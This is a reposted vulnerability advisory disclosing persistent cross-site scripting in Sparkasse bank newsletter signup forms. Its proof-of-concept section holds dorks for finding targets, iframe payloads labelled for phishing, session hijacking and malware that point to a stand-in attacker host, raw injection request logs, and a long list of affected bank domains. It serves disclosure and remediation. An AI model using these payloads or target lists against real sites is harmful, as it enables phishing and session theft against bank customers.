Sparkasse Cross Site Scripting

The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the Sparkasse online service web-application.


MD5 | 40ab69f0309c212c4b750c71a779f73e

Document Title:
===============
Sparkasse - Multiple Persistent Cross Site Scripting Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2173


Release Date:
=============
2019-03-07


Vulnerability Laboratory ID (VL-ID):
====================================
2173


Common Vulnerability Scoring System:
====================================
4.6


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Product & Service Introduction:
===============================
A savings bank is a credit institution with the task of offering
opportunities to broad sections of the population.
to offer financial investment, to carry out payment transactions and to
meet local credit needs.
to satisfy the needs of small and medium-sized enterprises as well.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Sparkasse )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site vulnerabilities in the Sparkasse online service
web-application.


Vulnerability Disclosure Timeline:
==================================
2018-10-25: Researcher Notification & Coordination (Security Researcher)
2018-10-26: Vendor Notification (S-CERT Department)
2018-10-29: Vendor Response/Feedback (S-CERT Department)
2019-02-20: Vendor Fix/Patch (Service Developer Team)
2018-**-**: Security Acknowledgements (S-CERT Department)
2019-03-07: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Sparkasse
Product: Mailing Server - Online Service (Web-Application)
2018 Q4 - 2019 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure Program


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official sparkasse online service newsletter web-application.
Local low privileged user accounts are able to inject own malicious
script codes on the application-side of the vulnerable service module.

The vulnerability is located in the `firstname`, `lastname` and
`companyname` values of the `newsletter` module. The vulnerable parameters
are f[1][v], f[2][v] & f[2][v]. Remote attackers are able to inject own
malicious script code via POST method request to the application-side
of the sparkasse dns domain mailing service. The attack vector of the
vulnerability is persistent on the application-side and the request
method to inject is POST. The attacker does not need to be directly
authenticated because its only an initial registration without direct
activiation request. The injection point are the vulnerable input fields
and the execution of the malform injected code takes place in the
`mailing.sparkasse.de` or unique `*sparkasse.de` domains by a
client-side GET method request.

The issue affects all pages listed with the newsletter module. Thus lead
to an integration to all the different
domains by the involved service provider. Now the vulnerability is all
over in the sparkasse domains and allows email spoofing, phishing,
cross site requests for redirect to malware or exploits and persistent
manipulation of sparkasse domain (dbms) contents. Due to a crawl we
identified a large list of affected web-applications from sparkasse by
usage of different google dork methods. A targeted user can not see
that the manipulated website is insecure because of the trusted native
source that deliveres the contexts over the sparkasse mailing api.

The security risk of the persistent web vulnerability is estimated as
medium with a cvss (common vulnerability scoring system v3) count of 5.2.
The exploitation of the persistent input validation web vulnerability
requires low user inter action and no privileged application user account.
Successful exploitation of the vulnerability results in session
hijacking, persistent phishing, persistent external redirects to
malicious sources
and persistent manipulation of affected or connected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Newsletter

Vulnerable Input(s):
[+] Vorname
[+] Nachname
[+] Firmenname

Vulnerable Parameter(s):
[+] f[1][v]
[+] f[2][v]
[+] f[3][v]

Affected Domain(s):
[+] mailing.sparkasse.de
[+] other unique domains like news.sparkasse ...


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with low
privileged application user account and medium required user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.

Google Dorks:
allinurl:sparkasse /de/home/service/newsletter.html
allinurl:sparkasse newsletter.html?n=true

Google Dork URL:
https://www.google.com/search?q=allinurl:sparkasse+/de/home/service/newsletter.html
https://www.google.com/search?q=allinurl:%3Asparkasse+newsletter.html?n?true



Payload: Phishing
test"><iframe src=http://www.evil.source.com/poc.html></iframe>

Payload: Session Hijacking
test"><iframe src=http://www.evil.source.com/
onload=alert(document.cookie)></iframe>
test"><iframe src=http://www.evil.source.com/
onload=alert(document.domain)></iframe>

Payload: Malware or Exploit
test"><iframe src=http://www.evil.source.com/poc.js></iframe>

Payload: Redirect
test"><window.frames["myFrame"].location = "http://...">



PoC: Demo URLs (Examples)
https://mailing.sparkasse.de/-viewonline2/15070/545/2055/QgsWbJ3W/rnckioVlCz/1
https://mailing.sparkasse.de/-viewonline2/6511/457/1029/961H3567/80CK9NcUj9/1
https://news.sparkasse-allgaeu.de/-viewonline2/6620/759/2129/tmBn69YJ/kU02LY1vXk/1



--- PoC Session Logs (POST) [Inject] ---
https://www.sparkasse-aachen.de/content/myif/spk-aachen/work/filiale/de/home/misc/vps/gate/_jcr_content.bin/emma/api/rest/39050000/optinsetup/5/form
Host: www.sparkasse-aachen.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer:
https://www.sparkasse-aachen.de/de/home/service/newsletter.html?n=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 324
Cookie: JSESSIONID=0000IkwJ8m_99MAwctzQGQvKqQ7:559eb1d1d;
IF6CONTEXT=SVBTVEFOREFSRDozOTA1MDAwMDpkZTpJRjpmYWxzZTpzcGstYWFjaGVu;
IFCLONE=559eb1d1d; IF_SPKDE_CHECK=SPKDE_CHECK;
vpi-3117116-SPKDE16=rd901o00000000000000000000ffffac10c6c0o80;
vpi-3117116-emma_session=eyJpdiI6IlZTV3o5bVNtMm5hOCthNm9cLzRvOEVnPT0iLCJ2YWx1ZSI6IjNCNTZQYnZNT2tDUkpZZTREQ01pTGtKVllLRUd0ZjQwYkhHSTExalErNm
RqMzV2QTBcL3hDc1wvSndUXC9YNk5rK0tQOEF6UGRrR2JHcEgzNCtMZVg4QitRPT0iLCJtYWMiOiIwNTdlZDUzMWU1NGUzNTBkZDkxMTE1MTk5OWRmMWI2ZDRmMmY1M
TEzMzdmM2E0MDMxZTMyZmFkMjdjZThkNTIxIn0%3D
Connection: keep-alive
f[0][i]=1&f[0][v][email protected]&f[1][i]=5&f[1][v]=a<iframe
src=http://www.evil.source.com/
onload=alert(document.cookie)>&f[2][i]=7&f[2][v]=b<iframe
src=http://www.evil.source.com/ onload=alert(document.cookie)>
&f[3][v]=<iframe src=http://www.evil.source.com/
onload=alert(document.cookie)>[i]=11&f[3][v]=1&l[]=1,5,3,9,7,37
-
POST: HTTP/1.1 200 OK
X-UA-Compatible: IE=edge
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache
Content-Length: 59
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Language: de-DE


--- PoC Session Logs (GET) [Execute] ---
https://mailing.sparkasse.de/-viewonline2/15070/545/2055/QgsWbJ3W/rnckioVlCz/1
Host: mailing.sparkasse.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: SPK_COOKIE=YmFua2NvZGU9NzY1NTAwMDA%3D;
TCPID=118104211048178479492; s_fid=65EF7EF7E0BBFBFC-20A9728F3A9D422B;
s_cc=true; TC_OPTOUT=0@@@017@@@ALL;
s_sq=spfgmbhsdeprod%3D%2526c.%2526a.%2526activitymap.%2526page%253Dservice%25253
Afilialsuche%2526link%253D%2525C3%252584ndern%2526region%253Dbank%2526pageIDType%253D1%2526.activitymap%2526.a%2526.c
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset="UTF-8"
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip



PoC: Source (Email & Web Pages)
<table style="margin:0px auto; width:600px;" class="c100" width="600"
cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff" align="center">
<tbody><tr><td colspan="3" height="25">&nbsp;</td></tr>
<tr>
<td class="c5" width="25">&nbsp;</td>
<td class="c90" width="550" valign="top">
<table width="100%" cellspacing="0" cellpadding="0" border="0"
bgcolor="#ffffff">
<tbody><tr>
<th style="font-weight: normal;" class="col"
valign="top" align="left">
<table width="100%" cellspacing="0" cellpadding="0"
border="0" bgcolor="#ffffff">
<tbody><tr>
<td style="font-family:Arial, Helvetica,
sans-serif; font-size:12px; line-height:18px; color:#333333;" align="left">
<strong>Sehr geehrte Frau
b"><iframe>%20>"<iframe src=evil.source>[EXECUTION
POINT!],</strong><br /><br />
waren Sie bereits im Urlaub oder
stehen Ihnen die schAPnsten Tage des Jahres noch bevor? In unserem ersten
Beitrag berichten
wir A1/4ber die aktuellen Urlaubstrends der Deutschen. Die praktische App
Kwitt kAPnnen Sie das ganze Jahr A1/4ber nutzen. Lesen Sie, wie einfach es
mit dieser Anwendung
innerhalb Ihrer App aSparkassea ist, Geld von Handy zu Handy zu
A1/4berweisen, und sei es, um die Rechnung vom letzten Besuch bei Ihrem
Lieblingsitaliener zu teilen.
AuAerdem informieren wir Sie unter anderem darA1/4ber, wie Sie am besten
vorgehen, wenn Sie im Urlaub Grund zu einer Reklamation haben. &nbsp;<br>
</td>
</tr>


Affected Domain(s):
===================
Sparkasse Domains:
https://www.sparkasse-ansbach.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-ger-kandel.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-wiehl.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-vogtland.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-allgaeu.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-iserlohn.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-wuppertal.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-offenburg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-nuernberg.de/de/home/service/Newsletter.html?n=true
https://www.sparkasse-ffb.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dachau.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-freiburg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-landshut.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-emh.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-krefeld.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-passau.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-moenchengladbach.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bremen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dillingen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-rhein-maas.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-adl.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-holstein.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-luedenscheid.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dueren.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-heidelberg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-hochsauerland.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-saarbruecken.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-delbrueck.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dortmund.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-rhein-maas.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-hanau.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-suedwestpfalz.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-pfaffenhofen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-fuerth.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-donnersberg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-freising.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-neumarkt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-muelheim-ruhr.de/de/home/service/newsletter.html
https://www.sparkasse-suew.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-celle.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-neuss.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bielefeld.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-radevormwald.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bamberg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dieburg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-soestwerl.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-radevormwald.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-emsland.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-kehl.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-schwandorf.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-neunkirchen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-lev.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-vorderpfalz.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-hagenherdecke.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-muelheim-ruhr.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-zollernalb.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-suedwestpfalz.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-passau.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-pforzheim-calw.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-wa-fkb.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-co-lif.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-elmshorn.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-ger-kandel.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-suedwestpfalz.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-amberg-sulzbach.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-lippstadt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dillingen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-olpe.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bremen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-ger-kandel.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-aachen.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-finnentrop.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-heilbronn.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-saalfeld-rudolstadt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-blomberg.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-darmstadt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-saalfeld-rudolstadt.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-bodensee.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-heilbronn.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-dachau.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-nuernberg.de/de/home/service/Newsletter.html?n=true
https://www.sparkasse-herford.de/de/home/immobilien/newsletter.html?n=true
https://www.sparkasse-hannover.de/de/home/ihre-sparkasse/newsletter.html?n=true
https://www.sparkasse-delbrueck.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-schwandorf.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-hagenherdecke.de/de/home/service/newsletter.html?n=true
https://www.sparkasse-mittelfranken-sued.de/de/home/ihre-sparkasse/newsletter.html?n=true
https://www.sparkasse-lemgo.de/de/home/privatkunden/junge-leute/flexibel-durchstarten/S-Club/anmeldung-newsletter.html?n=true
https://www.sparkasse-rhein-neckar-nord.de/de/home/ihre-sparkasse/ihre-sparkasse-vor-ort/newsletter.html?n=true

Sparkasse Unique Domains:
https://www.berliner-sparkasse.de/de/home/service/newsletter.html?n=true
https://www.herner-sparkasse.de/de/home/service/newsletter.html?n=true
https://www.foerde-sparkasse.de/de/home/service/newsletter.html?n=true
https://www.rhoen-rennsteig-sparkasse.de/de/home/service/newsletter.html?n=true
https://www.ksk-walsrode.de/de/home/service/newsletter.html?n=true
https://www.ospa.de/de/home/ihre-sparkasse/newsletter.html?n=true

Sparkasse Muster Systems & Partners:
https://partner.meine-sparkasse.de/partner/69051620/58/?blz=69051620&site=
https://sparkasse-musterstadt.if-einblick.de/de/home/service/newsletter.html?n=true
https://sparkasse-musterstadt-svrp.if-einblick.de/de/home/service/newsletter.html?n=true
https://sparkasse-musterstadt-sgvht.if-einblick.de/de/home/service/newsletter.html?n=true


Solution - Fix & Patch:
=======================
1. The vulnerability can be patched by a parse and encode of the
vulnerable `firstname`, `lastname` and `companyname` input fields
in all the affected newsletter by an automated or manual update. Ask
Sparkasse Kassel after the first incident they resolved the issue.

2. Restrict the affected input fields and disallow the usage of special
chars to prevent malicious script code injection attacks.

3. Escape or safe encode the name parameter content in the html
generated template on the affected sparkasse mailing or unique domain page.

4. Sanitize in the outgoing emails through the sparkasse server the
affected name parameters to finally resolve the vulnerability.

5. Integrate a secure process to gain knowledge of any vulnerability
that is tracked and reported to banks or in the patch cycle to ensure
that vulnerability issues cannot become major infrastructure issues
overnight.

Note: The issue has been reported to the finance informatic in 2018 q4
and was forwarded to the s-cert team of the sparkasse without any response.


Security Risk:
==============
The security risk of the persistent input validation web vulnerability
in the web-application module is estimated as medium.
The vulnerability can be used to produce malicious and malformed content
to phish or exploit user session data the easy way.
The targeted users can not see that the delivered contents are not from
the original sparkasse source.


Credits & Authors:
==================
Vulnerability Laboratory [Core Research Team] - Benjamin Kunz Mejri
(https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

Copyright A(c) 2019 | Vulnerability Laboratory - [Evolution
Security GmbH]aC/


--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



Related Posts